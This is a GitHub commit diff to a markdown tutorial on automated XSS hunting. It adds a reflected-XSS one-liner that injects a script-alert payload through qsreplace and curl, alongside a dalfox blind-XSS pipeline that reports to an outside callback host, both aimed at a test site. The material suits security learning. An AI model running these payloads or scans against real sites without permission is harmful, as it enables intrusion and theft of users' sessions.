Skip to content

Commit cb2af19

Browse files
authored
Update Automated_XSS.md
1 parent 684c418 commit cb2af19

File tree

1 file changed

+12
-1
lines changed

1 file changed

+12
-1
lines changed

XSS/Automated_XSS.md

+12-1
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@
1212
5) source .bashrc
1313
```
1414

15-
## How to Hunt XSS using Dalfox?
15+
## How to Hunt Blind XSS using Dalfox?
1616

1717
- Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
1818
- Use GF patterns to find Possible XSS Vulnerable Parameters.
@@ -22,16 +22,27 @@
2222
```bash
2323
waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt
2424
```
25+
## How to Hunt Reflected XSS?
26+
27+
- Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
28+
- Use qsreplace for Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path.
29+
30+
* Steps :
31+
```bash
32+
waybackurls testphp.vulnweb.com| grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
33+
```
2534

2635
## Tools Download Links:-
2736

2837
* 1:- [Dalfox](https://github.com/hahwul/dalfox)
2938
* 2:- [Waybackurls](https://github.com/tomnomnom/waybackurls)
3039
* 3:- [GF](https://github.com/tomnomnom/gf)
3140
* 4:- [GF Patterns](https://github.com/1ndianl33t/Gf-Patterns)
41+
* 5:- [qsreplace](https://github.com/tomnomnom/qsreplace)
3242

3343
Find Script here : [QuickXSS](https://github.com/theinfosecguy/QuickXSS)
3444

3545

3646
If you have any Questions, Reach out to me via [Twitter](https://twitter.com/g0t_rOoT_)
3747
## Twitter : [Fani Malik](https://twitter.com/fanimalikhack)
48+
## Twitter : [Faizee Asad](https://twitter.com/faizee_asad)

0 commit comments

Comments
 (0)